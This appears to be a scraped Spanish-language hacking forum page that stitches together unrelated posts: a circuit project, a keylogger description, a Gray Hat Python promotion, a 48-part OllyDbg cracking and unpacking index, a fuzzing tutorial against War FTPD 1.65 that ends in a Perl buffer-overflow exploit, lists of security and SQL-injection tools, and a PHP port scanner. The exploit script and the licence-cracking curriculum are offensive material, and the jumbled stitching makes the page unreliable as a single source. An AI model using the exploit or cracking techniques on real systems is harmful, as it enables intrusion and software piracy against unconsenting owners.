Underc0de - Hacking y seguridad informática

Bueno hoy en mi tiempo libre hice una firma, si bien es bastante simple, llevo su tiempito hacerla. Espero que les guste.

Bueno aca les dejo algunos diseños, espero que les gusten y sino hagan criticas constructivas.

Este recoje un gran variedad de teclas y obtiene el nombre de la ventana donde se esta escribiendo para mayor informacion y obtiene tambien clicks del mouse solo del boton Izquierdo.



Necesita un Timer de intervalo con 5 , puede ser menos pero yo lo probe con ese.
Este codigo fue probado con la versión Visual Studio 2005 Libre de errores y con un solo warning pero funciona sin problemas.

En esta publicación les presento un interesante proyecto muy fácil de hacer y práctico, que nos permitira comprobar continuidad en pistas de circuitos y cables, por decir alguna de las utilidades que le podes dar al instrumento.

Esquema eléctrico




Lista de componentes

Resistencias (todas de 1/4 w)
1 10k ohmios
2 330 "
1 1k "
1 100k "
1 22k "

Semiconductores
1 555 (timer)
1 hcf4093b (NAND de dos entradas schmitt trigger)
1 led 5mm verde
1 led 5mm rojo

Condensadores
2 10nf

Varios
1 Buzzer polarizado
2 pinzas cocodrilo y cable rojo negro
1 Conector para pila de 9v



Funcionamiento del circuito

Tenemos un sistema de visualización formado por dos led, uno rojo y el otro verde. Estos dos led's estan controlados por un flip-flop r-s hecho con compuertas NAND, estas puertas esta integradas en el HEF4093B.



Luego el timer 555 esta configurado como astable que genera una frecuencia audible cuando el material en prueba es conductor.

Entremos un poco mas en detalle del funcionamiento del circuito. Fijaros en el esquema que hay dos resistencia en serie formando un divisor de tensión resistivo por R3 y R4, en paralelo con R4 hay un punto abierto que es donde se conectara el objeto para saber si es aislante o conductor.


Si es aislante la tensión Vcc se reparte entre R3 y R4, pero como la resistencia R4 es mucho mayor que R3, casi toda la tensión recae en R4, esto se traduce en un nivel lógico(1) que es aplicado al flip-flop r-s formado por las compuertas NAND, esto hace que se mantenga en estado reset y activa el led rojo, el led verde permanece apagado. Por otro lado el timer 555 esta desactivado ya que la patilla 1 que debe estar a tierra esta a un potencial positivo y permanece apagado. En resumen, en esta condición el led rojo permanece encendido y no hay sonido, indicando que el material es aislante.


En la condición de continuidad cuando cerramos el circuito , el punto de unión de la resistencia R3 y R4 queda a tierra, esto se traduce en un nivel lógico (0) que es aplicado al flip-flop r-s haciendolo bascular de su estado reset a set , el led verde se activa y al mismo tiempo pone a tierra al terminal 1 del timer 555, produciendo un sonido en el buzzer. En resumen, en esta condición el led verde permanece encendido y produciendo un sonido indicando que hay continuidad.

Espero que les sirva, Saludos.

Python se está convirtiendo en el lenguaje de programación elegido por muchos que se dedican al hacking, a la ingeniería inversa y a probar software. La razón principal es que es fácil y rápido de escribir, soporta bajo nivel y tiene bibliotecas que nos hacen felices.

Ya no tendremos que buscar siempre en foros y manuales, Gray Hat Python muestra el uso de Python para una amplia variedad de tareas de hacking. Este libro explica los conceptos detrás de las herramientas de hacking y las técnicas con depuradores, troyanos, fuzzers y emuladores. Pero el autor, Justin Seitz, va más allá de la teoría mostrando cómo aprovechar las herramientas existentes de seguridad basadas en Python - y cómo construir las tuyas propias cuando lo necesites.

Leyendo este libro aprenderas a:

* Automatizar las tediosas tareas de ingeniería inversa y seguridad
* Diseñar y programar tu propio depurador
* Fuzzear drivers de Windows y a crear potentes fuzzers desde el principio
* Divertirte con la inyección de código y librerías, técnicas de soft y hard hooking y otros trucos con software
* Esnifar tráfico seguro de sesión web cifrada
* Usar PyDBG, Immunity Debugger, Sulley, IDAPython, PyEMU y más






You are not allowed to view links. Register or Login


Espero que les sirva y les guste.

Saludos dracko.rx

Tutorial completo sobre cracking con ollydbg.

Contiene 48 partes, los temas son los siguientes:

PARTE 001  -  CONOCIENDO A OLLYDBG - INSTALACION
PARTE 002  -  SISTEMAS NUMERICOS - NUMEROS POSITIVOS - NEGATIVOS - CARACTERES ASCII - QUE ES EL STACK
PARTE 003  -  REGISTROS Y FLAGS
PARTE 004  -  INSTRUCCIONES DE ASSEMBLER -  NOP, PUSH, POP, PUSHAD, POPAD, MOV, MOVSX, MOVZX, LEA, XCHG,
PARTE 005  -  INSTRUCCIONES MATEMATICAS - INC, DEC, ADD, ADC, SUB, SBB, MUL, IMUL, DIV, IDIV, XADD, NEG
                         INSTRUCCIONES LOGICAS - AND, XOR, OR, NOT -
PARTE 006  -  INSTRUCCIONES - COMPARACIONES Y SALTOS CONDICIONALES
PARTE 007  -  INSTRUCCIONES - CALL Y RET
PARTE 008  -  INSTRUCCIONES PARA LOOPS O CICLOS (BUCLES)
PARTE 009  -  PRIMERA APROXIMACION AL CRACKING - CRACKME DE CRUEHEAD
PARTE 010  -  BREAKPOINTS - BP COMUNES, ON MEMORY
PARTE 011  -  BREAKPOINTS - HARDWARE BREAKPOINTS - BP CONDICIONALES
PARTE 012  -  LOS MENSAJES DE WINDOWS - COLOCANDO BP EN LOS MENSAJES DE WINDOWS
PARTE 013  -  PEZCANDO Y REVIRTIENDO SERIALES
PARTE 014  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 015  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 016  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 017  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS - BUSCANDO EL SERIAL EN LA MEMORIA (CUANDO NO TENEMOS BOTON CHECK)
PARTE 018  -  PEZCANDO Y REVIRTIENDO SERIALES - BUSCANDO EL SERIAL EN LA MEMORIA (CUANDO NO TENEMOS BOTON CHECK)
PARTE 019  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - api: IsDebuggerPresent -
PARTE 020  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - POR NOMBRE DEL PROCESO - api: EnumProcesses
PARTE 021  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - POR NOMBRE DEL PROCESO - POR NOMBRE O CLASE DE LA VENTANA - api: CreateToolhelp32Snapshot, Process32First, Process32Next, FindWindowA
PARTE 022  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - apis: UnhandeldExceptionFilter - ZwQueryInformationProcess
PARTE 023  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - ProcessHeapFlag  y  NTGlobalFlag
PARTE 024  -  PROTECCIONES ANTIDEBUGGER - Resolviendo el Antisocial de la parte 23
PARTE 025  -  EXCEPCIONES
PARTE 026  -  CRACKEANDO VISUAL BASIC - NAGS

PARTE 027  -  CRACKEANDO VISUAL BASIC - NAGS, METODO DEL 4C
PARTE 028  -  CRACKEANDO VISUAL BASIC - INJERTAR EN DLL (MODIFICARLA)
PARTE 029  -  CRACKEANDO VISUAL BASIC - P-CODE
PARTE 030  -  CRACKEANDO VISUAL BASIC - P-CODE 2DA PARTE
PARTE 031  -  UNPACKING - NICIONES BASICAS
PARTE 032  -  UNPACKING - BUSCAR OPCODES, BUSCADOR DE OEP DE OLLY, METODO PUSHADD, METODO EXCEPCIONES, METODO API MUY USADA,
         METO PRIMERA API EJECUTADA
PARTE 033  -  UNPACKING - QUE ES IAT Y COMO REPARARLA
PARTE 034  -  UNPACKING - CON AYUDA DE PE TOOLS, IMPREC
PARTE 035  -  UNPACKING - CON OLLYDUMP, IMPREC  (EJEMPLO ASPACK)
PARTE 036  -  UNPACKING - CON OLLYDUMP, IMPREC  (OTRO EJERCICIO PRACTICO)
PARTE 037  -  UNPACKING - REPARAR ENTRADAS REDIRECCIONADAS
PARTE 038  -  UNPACKING - REPARAR ENTRADAS REDIRECCIONADAS
PARTE 039  -  STOLEN BYTES Y SCRIPTS
PARTE 040  -  SCRIPTS   (DESEMPACADO DEL PELOCK)
PARTE 041  -  SCRIPTS   (CONT. DESEMPACADO DEL PELOCK)
PARTE 042  -  UNPACKING - STOLEN BYTES (ACPROTECT 1.09)
PARTE 043  -  UNPACKING - REPARAR STOLEN BYTES (ACPROTECT 1.09)
PARTE 044  -  UNPACKING - REPARAR IAT - SCRIPTS (ACPROTECT 1.09)
PARTE 045  -  UNPACKING - REPARAR IAT - DUMPEADO (ACPROTECT 1.09)
PARTE 046  -  UNPACKING - FATMIKE
PARTE 047  -  UNPACKING - FATMIKE (2DA PARTE)
PARTE 048  -  UNPACKING - PESPIN 1.304





You are not allowed to view links. Register or Login

Fuente: Ricardo Navaja

 
  [idea] Para comenzar, diremos que se conoce como “Fuzzing” a las diferentes técnicas de software automatizadas, capaces de generar y enviar datos secuenciales o aleatorios a una o varias áreas o puntos de una aplicación, con el objeto de detectar defectos o vulnerabilidades existentes en el software auditado.
 
 [idea] Las herramientas con capacidad de “Fuzzing”, a menudo son conocidas como “Fuzzers”, y dependiendo de la implementación que cada una de estas herramientas haga de las técnicas de “Fuzzing”, es probable que existan tipos que se ajusten mejor a cada una de las diferentes necesidades del researcher o profesional a cargo del testing (Protocolos / Networking, Application / WebApplication, etc.).

 [idea] Si bien es cierto que el concepto de “Fuzzing” es de ámbito general de acuerdo a lo mencionado, quizás no sea mala idea el que conozcas como funciona cada una de las herramientas a tu alcance, antes de decidir su tilización en alguno de tus proyectos personales.

 [idea] Pero imagino que probablemente exista quien aún no haya entendido a lo que me estoy refiriendo, por tanto me permitiré tomar el siguiente ejemplo: Supongamos que necesitamos conocer si una aplicación en particular posee algún tipo de Buffer Overflow, a fin de detectar este tipo de situación, un tester sencillamente podría generar datos de distintos tamaños y enviar estos a uno de los puntos de entrada existentes en la aplicación, con el objeto de observar su comportamiento ante estas pruebas o mejor dicho como estos requerimientos son manejados. Si el programa a testear falla en tal menester, esto significara dos cosas: que hay defectos que corregir, y que probablemente sea posible explotar la falla.
 
 [idea] De acuerdo a lo mencionado hasta aquí, podemos inferir que el principal uso del Fuzzing, es el de testear software (servicios, protocolos, aplicaciones, etc.) con el objeto de encontrar defectos de desarrollo o implementación. Este testing no solo puede (y debe) ser llevado a cabo como parte del ciclo de vida de un desarrollo, sino que también comprende un método excelente de testeo a ser aplicado como parte de pentest del tipo “BlackBox”. Debido a su relativa sencillez, estas técnicas a menudo poseen una relación costo beneficio altamente efectiva. A pesar de esto, el Fuzzing no reemplaza el testing manual o los métodos tradicionales de testeo de software y QA, este solo podrá proveernos de una serie de pruebas aleatorias que podrían mostrarnos solo una parte del
problema.

 
 [idea] El “Fuzzing” de protocolos, no es muy diferente al “Fuzzing” de aplicación. Cada protocolo posee su propio set de parámetros y una estructura que a menudo puede ser testeada. Los “Fuzzers” basan parte de su tarea en la ventaja que les brinda el conocer exactamente como “debería” funcionar determinado protocolo basándose en los RFCs relacionados a tal o cual de ellos. De este modo, el Fuzzer sabe que debe esperar de cada una de las pruebas a las que someterá al protocolo a testear (o mejor dicho su implementación) y podrá alertar al tester cuando encuentre una respuesta que no ha podido ser manejada o ha sido manejada erróneamente.
 
 [idea] Pero ¿como hace realmente un Fuzzer para llevar a cabo su tarea? a fin de ejemplificar su operatoria, me basaré de un ejemplo que oportunamente publicara Sacha Faust, de You are not allowed to view links. Register or Login  en un excelente paper que aprovecho a recomendar desde aquí, el cual se denomina “Web Application Testing with SPI Fuzzer”. 
 
 [idea] Cuando se trabaja con fuzzing sobre HTTP, generalmente se intenta testear al menos cada uno de los siguientes aspectos del protocolo o su implementación:

 [idea] Para que quede un tanto mas claro, la idea detrás del fuzzing de protocolo http en este ejemplo, es básicamente la de parsear cada uno de los aspectos que componen el protocolo y testear mediante la generación de determinados requerimientos, cada uno de estos componentes en forma individual, a fin de  identificar el modo en que la implementación maneja las excepciones o inclusive la alteración de tráfico real.
 
 [idea] El request HTTP citado a continuación, corresponde a un requerimiento real hecho por un browser a un sitio web determinado. Las partes dispuestas en color rojo, representan algunos de los datos/campos que tal como mencionáramos en el párrafo anterior podrían ser sometidos a “Fuzzing” en forma individual, a fin de observar su comportamiento:

 
 [idea] Bien, ahora que conoces conceptualmente alguno de los aspectos más importantes en torno al Fuzzing, creo que es hora de dar nuestros primeros pasos en la utilización de alguna herramienta que implemente este tipo de técnicas.
 
 [idea] Una rápida búsqueda en Google, probablemente arroje una serie de páginas con links a algunas de las herramientas más populares. Algunos buenos ejemplos de estas, sin lugar a dudas sean: SPIKE 2.9 de Immunitysec, mielietools 1.0 de Sensepost, SPI Fuzzer de SPI Dynamics y Fuzzer 1.1 de Sergio “Shadown” Alvarez.
 
 [idea] A los efectos de ilustrar este artículo, he decidido utilizar mi preferido: Fuzzer 1.1 de  Sergio “Shadown” Alvarez. Los motivos de esta elección son varios. En primer lugar, su código se encuentra disponible y se distribuye bajo GPL. En segundo lugar, es pequeño, sencillo, potente, rápido y esta escrito en Python .

 [idea] Antes de comenzar vamos a asegurarnos de que has obtenido lo necesario como para tener Fuzzer 1.1 funcionando en tu equipo de pruebas:

  Python 2.2:Puesto que Fuzzer 1.1, se encuentra desarrollado en Python, la instalación de este entorno resulta imprescindible

  pyOpenSSL:A fin de manejar en forma correcta el tráfico SSL, Fuzzer 1.1 requiere tener instaladas las librerías provistas por este wrapper de nombre pyOpenSSL  . Su instalación es sumamente sencilla y no deberías tener problemas para tener funcionando esta en segundos.

You are not allowed to view links. Register or Login



You are not allowed to view links. Register or Login


  Descargar Fuzzer 1.1 You are not allowed to view links. Register or Login

 [idea] Fuzzer 1.1 es una sencilla y potente herramienta de “fuzzing” desarrollada por Sergio “Shadown” Alvarez . Esta se entrega con los protocolos FTP, SMTP y POP3 declarados por defecto y listos para usar,  aunque debido a su concepción modular, el agregado de nuevos protocolos, debería resultar en una tarea sencilla pro medio de la edición del archivo de configuración “protocols.py”. Al descargar el tar.gz, no tendrás más que disponer de un directorio (fuzzer-1.1 por defecto) donde descomprimir sus archivos y comenzar a disfrutar de sus bondades.

 [idea] Ok, si todo ha salido bien, tu sistema contará a partir de este momento, con una instalación de Python, las rutinas SSL requeridas por la aplicación, y Fuzzer 1.1 lista para ser ejecutada. Para constatar que todo este funcionando, sencillamente abriremos  una ventana de comandos (Ejecutar-->CMD.exe-->Enter),  nos situaremos sobre el directorio donde hemos instalado Fuzzer 1.1, y ejecutaremos la siguiente línea:


C:\Documents and Settings\Administrador\Escritorio\fuzzer-1.1>fuzzer.py
  Luego de dar entrada al comando anterior, deberías estar viendo la ayuda de Fuzzer 1.1 tal como se muestra en la Imagen.



 [idea] Felicitaciones!! ya estas en condiciones de comenzar a realizar testear algunas aplicaciones y protocolos!, que ¿como haces esto? bien... la verdad es que la respuesta acuanto tus conocimientos de lenguajes de programación, protocolos, networking y seguridad, pero para no decepcionarte vamos a descargar un viejo programa FTP muy conocido por su popularidad y por la existencia de algunos Buffer Overflows encontrados en algunas de sus versiones, en particular en la 1.65, se trata de War FTP Daemon

  Descargar War FTPD Daemon 1.65You are not allowed to view links. Register or Login

 [idea] Ok, te diré lo que haremos ahora para poder probar la efectividad de Fuzzer 1.1 en la detección de posibles bugs en el software... Descargado e instalado este servidor FTP(Setup.exe), procederemos a ejecutarlo (war-ftpd.exe). Luego de dar OK en la pantalla de bienvenida, nos encargaremos de que el servicio FTP se ponga a correr... para esto, deberemos hacer click en el icono ilustrado con un rayo



Ya es hora, abriremos ahora una nueva ventana de comando (CMD.EXE), ingresaremos al directorio donde hayamos instalado el Fuzzer, y procederemos a ejecutarlo con la siguiente línea de comando:
 
C:\Documents and Settings\Administrador\Escritorio\fuzzer-1.1>fuzzer.py –h localhost –p 21 –t FTP


 [idea] Perfecto, luego de dar entrada a esta línea, Fuzzer se pondrá a trabajar creando y enviando paquetes, para luego evaluar su resultado .



 [idea] Ahora bien, puesto que el software que estamos testeando tiene un bug (Reportado y reparado hace mucho tiempo ya...) llegara un momento donde Fuzzer hará que WarFTPD se cierre inesperadamente, para luego anunciar un mensaje en pantalla  en donde podrás leer:
 


 [idea] Ahora Analizamos la Informacion que nos Entrega Fuzzer 1.1 .


 [idea] Ahora si nos Damos Cuenta en un inicio del Analisis.

  Please enter your user name.: Como nos muestra en todo el analisis, empieza a verificar si puede producirse un buffer overflow por la cantidad de caracteres en el user o password, y empieza a chequear cuantos, caracteres nececita para poder provocar esta vulnerabilidad.

  Luego Detecta una Vulnerabilidad, por la cantidad de caracteres introducidos en el username. alrededor de 1000 caracteres.

 [idea] Tambien navegando por Internet encontre informacion que confirmo mi analisis sobre el Fuzzer.

 [idea] Esta vulnerabilidad fuese tenido alguna utilidad  hace 9 años, porque fue descubierto en 1998, busque y busque y no encontre un exploit, con conocimiento basico sobre perl se pudo codear este exploit, lo cual hago mension aqui, es mi primer exploit, aunque no tiene ninguna utilidad para explotar algun ordenador que este corriendo este servicio, pero si de uso educacional.

  Una ves Analizado el Resultado del Fuzzer, y respaldado por el Bugtraq, ahora podemos crear nuestro exploit.

Exploit War FTPD 1.65 Buffer Overflow By OzX [Perl]

#!/usr/bin/perl
# ===============================================================================================
#                            War FTPD 1.65
#                               By OzX
# ==============================================================================================
# Referencia: [url]http://seclists.org/bugtraq/1998/Feb/0013.html[/url]
# Windows 95/NT War FTPD 1.65 Buffer Overflow
# Exploit Diseñado para el Manual de Fuzzer: Buscando Vulnerabilidades
# [url=http://www.new-Bytes.net]www.new-Bytes.net[/url]
# #================================================================================================
use strict;
use Net::FTP;

my $username = "////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////";
my $pwd = "exploit";
my $ftp = Net::FTP->new("localhost") or die("No se pudo conectar al servidor, porque el user y pass no eran correctos \n, pero se logro la intencion de crear el buffer overflow : $!");
$ftp->login($username,$pwd) or die("Login incorrecto: $!");
$ftp->quit or die("No se puede desconectar del servidor: $!");
  Bueno Aqui les Dejo un Video en donde Demuestra que el Exploit Funciona a la Perfeccion.

You are not allowed to view links. Register or Login




[idea] Saludos, y Ojala que entiendan mi Adaptacion, la creacion del Exploit y todo lo demas, la siguiente semana lo volvere a revisar para seguir expandiendolo ya que el tema da para mucho mas,tambien para que se paresca menos al paper original y se expanda, aunque de forma de introduccion es bastante bueno.

Herramientas de seguridad

Un fuzzer es un programa que intenta descubrir vulnerabilidades de seguridad enviando una entrada arbitraria a una aplicacion. Si el programa contiene una vulnerabilidad que puede conducir a una excepción, el choque o el error de servidor (en el caso de web apps), puede ser determinado que una vulnerabilidad ha sido descubierta. Fuzzers a menudo son llamados Inyectores de Falta por esta razón, ellos generan faltas y les envían a una aplicacion. Generalmente los fuzzers están bien para el encuentro de buffer overflow, DoS, SQL Injection, XSS, y bugs Format String . Ellos hacen un trabajo pobre en el encuentro de vulnerabilidades relacionada con el descubrimiento de la información, defectos de cifrado y cualquier otra vulnerabilidad que no hace que el programa se estrelle.

Contra lo que pueda parecer, el sistema no es nuevo. Fuzz, desarrollado en 1990 por Barton Miller en la Universidad de Wisconsin en Madison, pasa por ser el primer fuzzer, pero hoy en día se cuentan por decenas los programas de este tipo, utilizados generalmente en tests de penetración…

Pero, ¿cuál es la efectividad de los fuzzers contra los navegadores web? Sencillamente extraordinaria. Por poner un ejemplo, en pocas semanas H.D. Moore (investigador de seguridad creador y responsable del Metasploit Project), asegura haber encontrado cientos de formas de colgar Internet Explorer, y en menor medida el resto de navegadores.

La siguiente es una lista de programas fuzzers con una breve explicacion:

    * (L)ibrary (E)xploit API - lxapi

Una coleccion de Scripts en python para fuzzing
Mangle

Un fuzzer para generar etiquetas de HTML impares, esto también autolanzará un navegador. El programa encontró el infame IFRAME IE bug.
SPIKE - Una colección de muchos fuzzers de Inmunidad. Usado para encontrar el reciente remoto RDP kernel DoS against a firewalled XP SP2, y muchos otros.
PROTOS WAP - Un fuzzer del proyecto PROTOS para fuzzing WAP
PROTOS HTTP-reply - Otro fuzzer de los tipos PROTOS para ataque/ respuestas de HTTP, útiles para broswer vulns.
PROTOS LDAP - Para fuzzing LDAP, no tan acertado como los demás del proyecto PROTOS
PROTOS SNMP - Clasico SNMP fuzzer, encontrando una vuln en casi cada engranaje conectado a una red disponible en el tiempo (2002).
PROTOS SIP - Para fuzzing a todos aquellos nuevos dispositivos de VOIP SIP que usted ve por todas partes.
PROTOS ISAKMP - Para atacar implementaciones IPSec.
RIOT & faultmon - Para atacar protocolos de texto simples (Telnet, HTTP, SMTP). Usado por Riley Hassell cuando él trabajó en eEye para descubrir el IIS .printer overflow e incluido en The Shellcoder’s Handbook.
SPIKE Proxy - Un semi-funcional web fuzzer del Inmunidad que trajo el original SPIKE
Tag Brute Forcer - Fuzzer imponente de Drew Copley de eEye para atacar ActiveX en uso. Usado para encontrar un manojo de bugs en IE, incluyendo unos realmente poderosos para alcanzar heap overflows.
FileFuzz - Un formato de archivo fuzzer para PE (windows) binarios de iDefense. Tiene bonito GUI. Recientemente usado para encontrar bugs en Word.
SPIKEFile - Un formato de archivo fuzzer para ataque ELF (Linux) binarios de iDefense. Basado en SPIKE
notSPIKFile - Un ELF fuzzer estrechamente relacionado con FileFuzz, en vez de usar SPIKE como un punto de partida.
Screaming Cobra -El nombre hace al fuzzer parecer mejor de lo que realmente es, pero está bien para encontrar bugs CGI. También,es un perl script fácil de modificar o extenderse.
WebFuzzer -Un fuzzer para (adivina qué?) web app vulns.
eFuzz - Un fuzzer para el protocolo generico TCP/IP. Fácil de usar, pero tal vez no tan destacado como otros de esta lista.
Peach Fuzzer - Gran fuzzer escrito por Michael Eddington. Este Fuzzer es más un marco para construir otros fuzzers.
Fuzz - El ORIGINAL fuzzer desarrollado por Dr. Barton Miller que fue el Alma Matter, de la University of Wisconsin-Madison en 1990.
Fuzzball2 un pequeño fuzzer para TCP e IP. Esto envía un manojo de paquetes más o menos falsos a la host de su eleccion.
Fuzzer version 1.1 es una herramienta para fuzzing de multiple protocolo escrita en python.Esto puede ser usado encontrar SQL injection, format string, buffer overflow, directory traversal, y otras vulnerabilidades.
Scratch es un destructor de protocolo avanzado (”fuzzer”) que rutinariamente puede encontrar una amplia variedad de vulnerabilidades de un paquete simple. El programa hace el análisis de complejos archivos binarios. También viene con un marco para protocolos fuzzing binarios como SSL Y SMB.

* Nessus

Auditor de Seguridad Remoto. El cliente “The Nessus Security Scanner” es una herramienta de auditoría de seguridad. Hace posible evaluar módulos de seguridad intentando encontrar puntos vulnerables que deberían ser reparados. Está compuesto por dos partes: un servidor, y un cliente. El servidor/daemon, “nessusd” se encarga de los ataques, mientras que el cliente, “nessus”, se ocupa del usuario por medio de una linda interfaz para X11/GTK+. Este paquete contiene el cliente para GTK+1.2, que además existe en otras formas y para otras platarformas.

   
* Netcat

Una navaja multiuso para TCP/IP. Una utilidad simple para Unix que lee y escribe datos a través de conexiones de red usando los protocolos TCP o UDP. Está diseñada para ser una utilidad del tipo “back-end” confiable que pueda ser usada directamente o fácilmente manejada por otros programas y scripts. Al mismo tiempo, es una herramienta rica en características útil para depurar (debug) y explorar, ya que puede crear casi cualquier tipo de conexión que puedas necesitar y tiene muchas características incluídas.

Tcpdump

Una poderosa herramienta para el monitoreo y la adquisición de datos en redes. Este programa te permite volcar (a un archivo, la pantalla,etc.) el tráfico que presenta una red. Puede ser usado para imprimir los encabezados de los paquetes en una interfaz de red (”network interface”) que concuerden con una cierta expresión. Se puede usar esta herramienta para seguir problemas en la red, para detectar “ping attacks” o para monitorear las actividades de una red.

* Snort

un Sniffer/logger de paquetes flexible que detecta ataques. Snort está basado en la biblioteca `libpcap’ y puede ser usado como un “sistema de detección de intrusiones” (IDS) de poco peso. Posee un registro basado en reglas y puede buscar/identificar contenido además de poder ser usado para detectar una gran variedad de otros ataques e investigaciones (probes), como buffer overflows, barridos de puertos indetectables (stealth port scans), ataques CGI, pruebas de SMB (SMB probes), y mucho más. Otra característica importante de Snort es la capacidad de alertar en tiempo real, siendo estas alertas enviadas a syslog, un archivo de alerta separado o incluso a una computadora con Windows a través de Samba.

* Ethereal

Ethereal es un analizador de tráfico de redes, o “sniffer” para Unix y Sistemas operativos del tipo Unix. usa GTK+, una biblioteca de interfaz gráfica para el usuario (GUI), y libcap, una bliblioteca que facilita la captura y el filtrado de paquetes.

* Whisker

El excelente escáner de vulnerabilidades en CGI de Rain.Forest.Puppy.

* Abacus Portsentry

Este demonio de detección de barrido de puertos tiene la habilidad de detectar estos barridos (incluyendo “stealth scans”) en las interfaces de red de tu máquina. Como medida de alarma, puede bloquear al atacante por medio de “hosts.deny”, bloqueando el ruteo hacia la máquina hostil o por medio de reglas de firewall. Es parte del set de programas “Abacus”. Nota: Si no tenés idea de qué es una port/stealth scan, te recomiendo darte una vuelta por Psionic antes de instalar este paquete. De otra forma, podrías fácilmente bloquear cualquier host que no deberías. (por ej. tu servidor de NFS, tu servidor de DNS, etc.)

* DSniff

Un comprobador de integridad de archivos y directorios. Tripwire es una herramienta que ayuda a administradores y usuarios de sistemas monitoreando alguna posible modificación en algún set de archivos. Si se usa regularmente en los archivos de sistema (por ej. diariamente), Tripwire puede notificar a los administradores del sistema, si algún archivo fue modificado o reemplazado, para que se puedan tomar medidas de control de daños a tiempo.

* Hping2

hping2 es una herramienta de red capaz de enviar paquetes ICMP/UDP/TCP hechos a medida y de mostrar las respuestas del host destino de la misma manera en la que lo hace la herramienta `ping’ los las respuestas de ICMP. Puede manejar fragmentación y tamaños y cuerpo arbitrarios de paquetes; además puede ser utilizado para transferir archivo usando protocolos soportados. Al usar hping2, se puede: evaluar el desempeño de la red utilizando diferentes protocolos, tamaños de paquetes, TOS (type of service, o sea, tipo de servicio), y fragmentación; realizar descubrimiento de camino utilizando el campo MTU (onda traceroute); transferir archivos (incluso ante reglas de firewall muy fascistas); realizar funciones al estilo `traceroute’ pero bajo diferentes protocolos; detección remota de OS (`remote OS fingerprinting’); auditar una implementación de TCP/IP (`TCP/IP stack’) en particular; etc. hping2 es una buena herramienta para aprender acerca de TCP/IP.

* SARA

El Asistente de Investigación para el Auditor de Seguridad (Security Auditor’s Research Assistant) es una herramienta de análisis de seguridad de tercera generación que está basada en el modelo de SATAN y distribuída bajo una licencia del estilo de la GNU GPL. Promueve un ambiente colaborativo y es actualizada periódicamente para tener en cuenta las últimas amenazas.

* Sniffit

Una herramienta de monitoreo y “packet sniffer” para paquetes de TCP/UDP/ICMP. sniffit es capaz de dar información técnica muy detallada acerca de estos paquetes (SEC, ACK, TTL, Window, …) pero también los contenidos de los paquetes en diferentes formatos (hex o puro texto, etc.).

* IPFilter

IP Filter es un filtro de paquetes de TCP/IP, adaptable para uso en un ambiente de firewall. Puede ser utilizado como una módulo de kernel o incorporado en tu kernel de UNIX; es áltamente recomendable utilizarlo como un módulo de kernel. Viene junto con scripts para instalarlo y parchar archivos de sistema, si se require.

* Iptables/netfilter/ipchains/ipfwadm

Administradores de los filtros de paquetes de IP para kernels 2.4.X. iptables se usa para configurar, mantener e inspeccionar las tablas de reglas de filtrado de paquetes de IP en Linux. La herramienta iptables también soporta configuración de NAT (Network Address Translation) dinámica y estática.

* Firewalk

Firewalking es una técnica desarrollada por MDS y DHG que emplea técnicas del estilo de `traceroute’ para determinar las reglas de filtrado que se están usando en un dispositivo de transporte de paquetes (NdelT: quise traducir “packet forwarding device”). La última versión de esta herramienta, fierwalk/GTK incluye la opción de usar una interfaz gráfica y nuevos arreglos a errores.

* Strobe

Un “clásico” escáner de puertos de TCP de alta velocidad.

* Jonh the Ripper

Una herramienta activa para crackear passwords. Útil para encontrar passwords débiles de tus usuarios.

* Ntop

Muestra la utilización de la red al estilo de la herramienta `top’. Muestra un sumario del uso de la red de las máquinas en ella en un formato que recuerda a la utilidad de unix `top’. También puede ser utilizada en un `web mode’, que permite ver los resultados a través de un explorador de web.


Top 15 con las mejores tools o scanners de sql injection free.


* SQLIer
* SQLbftools
* SQL Injection Brute-forcer
* SQLBrute
* BobCat
* SQLMap
* Absinthe
* SQL Injection Pen-testing Tool
* SQID
* Blind SQL Injection Perl Tool
* SQL Power Injection
* FJ-Injector Framwork
* SQLNinja
* Automagic SQL Injector
* NGSS SQL Injector
[/b][/color]
FUENTE:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

VIDEO
You are not allowed to view links. Register or Login

framework-3.2.exe (win32)You are not allowed to view links. Register or Login
framework-3.2.tar.gz (unix)You are not allowed to view links. Register or Login

<?php

define(NAMEFILE,"ports.html");
if ($argv[1]==NULL)
{
print 
"
###########     Port Scaner    By _84kur10_ , JxE-13  ##############
#                                                                  #
#        Escaner de puertos                                        #
#        Busca ports open                                       #
#==================================================================#
#  Usage: php Scan.php ip initport eofport                         #
#  [email protected] Black Team, LatinoHackTeam, Ro0T-MaFia                 #
####################################################################\n\n";
die;
}
$init=(int)$argv[2];
$eof =(int)$argv[3];
$ip  =$argv[1];
function savePort($info)
{
$fp = fopen(NAMEFILE,"ab+");
fwrite($fp,$info."<br>");
fclose($fp);
}
savePort("<br><h1>Resultado de escan para ".$ip."</h1><br>");
savePort("c0ded by _84kur10_, JxE-13 <br>");
print "Scaneando...\n";

for ($i=$init;$i<=$eof;$i++){
$conect=fsockopen($ip, $i,$errno, $errstr, 30);
if(false==$conect)
{
print  "\nPuerto ".$i." No encontrado\n";
}
else
{
$info= "\n\nPuerto ".$i." Fue encontrado Abierto\n";
savePort($info);
print $info;
}
}

?>